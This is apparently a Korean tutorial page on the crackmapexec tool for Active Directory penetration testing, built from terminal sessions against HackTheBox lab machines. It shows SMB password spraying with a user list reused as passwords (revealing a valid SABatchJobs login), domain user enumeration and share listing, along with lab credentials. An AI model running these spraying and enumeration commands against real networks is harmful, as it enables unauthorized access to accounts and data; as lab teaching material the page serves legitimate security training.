crackmapexec

1. 개요

내부 계정 목록을 알아내기 위한 비밀번호 대입 도구로 주로 사용하나, 이를 넘어서 내부망(AD환경) 모의 해킹의 알파이자 오메가이다. 통상 아이디와 비밀번호를 같이 쓰는 경우가 존재하므로 아이디만 알아도 50%의 공격은 성공했다고 할 수 있다.

현재는 nxc 로 개발되며, crackmapexec 의 개발 및 지원은 중단됨

2. 사용법

2.1. 기본 사용법

아래와 같이 사용할 수 있다. 로그인에 성공하는 경우 프로그램이 자동으로 종료되는데, --continue-on-success 를 하면 성공하는 계정이 있더라도 다른 계정들이 더 성공하는 게 있는지 확인할 수 있다.

Copy┌──(root㉿kali)-[/home/kali/labs/Monteverde]
└─# crackmapexec smb 10.129.23.156 -u users.txt -p users.txt --continue-on-success
SMB         10.129.23.156   445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE 
[...SNIP...]

2.2. 사용자 추출

--users 옵션을 이용하면 서버 내 사용자들을 추출할 수 있다.

Copy┌──(root㉿kali)-[/home/kali/labs/Flight]
└─# crackmapexec smb 10.129.37.19 -u svc_apache -p 'S@Ss!K@*t13' --users
SMB         10.129.37.19    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.129.37.19    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.129.37.19    445    G0               [+] Enumerated domain user(s)
SMB         10.129.37.19    445    G0               flight.htb\O.Possum                       badpwdcount: 0 desc: Helpdesk                                                                                                                 
SMB         10.129.37.19    445    G0               flight.htb\svc_apache                     badpwdcount: 0 desc: Service Apache web                                                                                                       
SMB         10.129.37.19    445    G0               flight.htb\V.Stevens                      badpwdcount: 0 desc: Secretary                                                                                                                
SMB         10.129.37.19    445    G0               flight.htb\D.Truff                        badpwdcount: 0 desc: Project Manager                                                                                                          
SMB         10.129.37.19    445    G0               flight.htb\I.Francis                      badpwdcount: 0 desc: Nobody knows why he's here                                                                                               
SMB         10.129.37.19    445    G0               flight.htb\W.Walker                       badpwdcount: 0 desc: Payroll officer                                                                                                          
SMB         10.129.37.19    445    G0               flight.htb\C.Bum                          badpwdcount: 0 desc: Senior Web Developer                                                                                                     
SMB         10.129.37.19    445    G0               flight.htb\M.Gold                         badpwdcount: 0 desc: Sysadmin                                                                                                                 
SMB         10.129.37.19    445    G0               flight.htb\L.Kein                         badpwdcount: 0 desc: Penetration tester                                                                                                       
SMB         10.129.37.19    445    G0               flight.htb\G.Lors                         badpwdcount: 0 desc: Sales manager                                                                                                            
SMB         10.129.37.19    445    G0               flight.htb\R.Cold                         badpwdcount: 0 desc: HR Assistant                                                                                                             
SMB         10.129.37.19    445    G0               flight.htb\S.Moon                         badpwdcount: 0 desc: Junion Web Developer                                                                                                     
SMB         10.129.37.19    445    G0               flight.htb\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account                                                                                  
SMB         10.129.37.19    445    G0               flight.htb\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain                                                                 
SMB         10.129.37.19    445    G0               flight.htb\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain                                                                   

2.3. 공유 폴더 확인

--shares 옵션을 이용하면 smbmap 처럼 특정 계정으로 공유되는 폴더들을 확인할 수 있다.

Copy┌──(root㉿kali)-[/home/kali/labs/Flight]
└─# crackmapexec smb 10.129.37.19 -u s.moon -p 'S@Ss!K@*t13' --shares
SMB         10.129.37.19    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.129.37.19    445    G0               [+] flight.htb\s.moon:S@Ss!K@*t13 
SMB         10.129.37.19    445    G0               [+] Enumerated shares
SMB         10.129.37.19    445    G0               Share           Permissions     Remark
SMB         10.129.37.19    445    G0               -----           -----------     ------
SMB         10.129.37.19    445    G0               ADMIN$                          Remote Admin
SMB         10.129.37.19    445    G0               C$                              Default share
SMB         10.129.37.19    445    G0               IPC$            READ            Remote IPC
SMB         10.129.37.19    445    G0               NETLOGON        READ            Logon server share 
SMB         10.129.37.19    445    G0               Shared          READ,WRITE      
SMB         10.129.37.19    445    G0               SYSVOL          READ            Logon server share 
SMB         10.129.37.19    445    G0               Users           READ            
SMB         10.129.37.19    445    G0               Web             READ